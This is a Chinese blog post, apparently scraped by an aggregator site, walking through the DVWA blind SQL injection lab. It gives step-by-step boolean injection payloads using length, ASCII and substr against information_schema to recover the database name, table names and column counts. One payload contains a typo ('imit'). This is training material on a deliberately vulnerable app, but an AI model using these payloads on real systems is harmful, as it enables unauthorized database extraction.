首页 > 数据库 >DVWA-SQL盲注

DVWA-SQL盲注

时间:2023-07-08 14:22:04浏览次数:32  
标签:name database ASCII DVWA substr SQL table 盲注 schema

尝试1到10发现只有存在5个数据库id
接下来判断是什么类型的
说明是字符型的

判断数据库长度
1' and length(database())=4#
说明数据库只有四个字节

接下来猜/判断字符串ASCII
第一个字符

1' and ASCII(substr(database(),1,1))>97#正确

1' and ASCII(substr(database(),1,1))>110# 错误

1' and ASCII(substr(database(),1,1))=100# 正确
说明第一个字符为d
以此类推
第二个字符

1' and ASCII(substr(database(),2,1))=118# 正确v
第三个字符
1' and ASCII(substr(database(),3,1))=119#正确w
第四个字符
1' and ASCII(substr(database(),4,1))=97# 正确a
所以数据库为dvwa

判断数据表有几个
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2#
只有两个表
查看表的长度
第一个
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=5 #
第二个
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=5 #

猜名字 猜ASCLL
第二个表
第一个字符

1' and ASCII(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=117 # u
由于已知需要的表名为user
以此类推
1' and (select count(column_name) from information_schema.columns where table_name='users')=10#
猜解名字
' or ASCII(substr((select column_name from information_schema.columns where table_name='users'imit 1,1),1,1))=102 #

标签:name,database,ASCII,DVWA,substr,SQL,table,盲注,schema
From: https://www.cnblogs.com/fzlgxy085/p/17537181.html

相关文章

  • mysql常用命令有哪些?
    mysql常用命令退出mysql: exit查看mysql中有哪些数据库?showdatabase; 以英文的分号结尾mysql>showdatabases;+--------------------+|Database|+--------------------+|dbtest1||dbtest2||dbtest3||information_sc......
  • 如何实现MySQL大表查询慢的具体操作步骤
    MySQL大表查询慢的问题解决流程对于MySQL大表查询慢的问题,我们可以采取以下流程进行解决。以下表格展示了整个流程,以及每一步需要做的事情和相应的代码。步骤操作代码1检查索引SHOWINDEXFROMtable_name;2优化查询语句EXPLAINSELECT*FROMtable_nameWHERE......
  • 解决MySQL存储较长的字符串的具体操作步骤
    MySQL存储较长的字符串在数据库中,我们经常需要存储各种类型的数据。有时,我们需要存储较长的字符串,如文章内容或者文本文件。MySQL是一个流行的关系型数据库管理系统,它提供了多种方式来存储较长的字符串数据。本文将介绍在MySQL中存储较长的字符串的几种常用方法,并提供相应的代码示......
  • 如何实现MySQL创建排班表的具体操作步骤
    MySQL创建排班表在现代社会中,许多企事业单位都需要对员工进行排班管理,以保证工作的正常运转。MySQL作为一个强大的关系型数据库管理系统,可以很好地满足这个需求。本文将介绍如何使用MySQL创建一个排班表,并通过代码示例演示其使用方法。创建数据表首先,我们需要创建一个数据表来存......
  • 如何实现MySQLn元关系是指关系中的具体操作步骤
    MySQL多元关系的实现概述在MySQL数据库中,多元关系是指一个关系表中包含多个外键,从而实现多个表之间的关联。通过多元关系,我们可以在数据库中存储和查询多个表之间的关联数据,从而提高数据的查询效率和准确性。实现步骤下面是实现MySQL多元关系的一般步骤:步骤描述1创......
  • 解决MySQL5.5安装无响应的具体操作步骤
    MySQL5.5安装无响应MySQL是一种开源的关系型数据库管理系统,被广泛应用于Web应用程序的后台数据存储和管理。然而,在安装MySQL5.5版本时,有时候会出现无响应的情况,给用户带来困扰。本文将介绍可能导致MySQL5.5安装无响应的原因,并提供相应的解决方案。原因分析系统冲突:安装MySQL5.......
  • 如何实现MySQL 字符串转换成数组的具体操作步骤
    MySQL字符串转换成数组在MySQL中,我们经常需要对字符串进行处理和转换。有时候,我们需要将一个字符串拆分成多个部分,然后进行进一步的处理。这时,将字符串转换成数组是一种常见的操作。方法一:使用SUBSTRING_INDEX函数MySQL提供了SUBSTRING_INDEX函数,可以用于将一个字符串按照指定......
  • 如何实现MySQL 一张表多个id列对应多张表的数据的具体操作步骤
    MySQL一张表多个id列对应多张表的数据在数据库设计和管理中,我们经常会遇到一种情况:一个表中的某些列需要与其他表中的数据建立关联。MySQL提供了多种方式来实现这种关联关系,其中一种常见的方式是通过多个id列对应多张表的数据。在本文中,我们将介绍如何在MySQL中实现这种关联关系,......
  • 解决MySQL 修改创建用户 主机名的具体操作步骤
    MySQL修改创建用户主机名简介在MySQL中,我们可以通过修改和创建用户来管理数据库的访问权限。本文将向刚入行的小白介绍如何通过MySQL来修改和创建用户的主机名。操作步骤下表总结了修改和创建用户主机名的步骤:步骤操作步骤1登录MySQL数据库步骤2查看已存在的......
  • 解决MySQL update两个表关联的具体操作步骤
    MySQLupdate两个表关联在MySQL中,我们经常需要更新一个表中的数据,并且在这个过程中需要关联另一个表。这种情况下,我们可以使用UPDATE语句来实现这样的操作。本文将介绍如何在MySQL中使用UPDATE语句来关联两个表。表结构首先,我们来创建两个表,以便于后续的演示。CREATETABLEuse......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99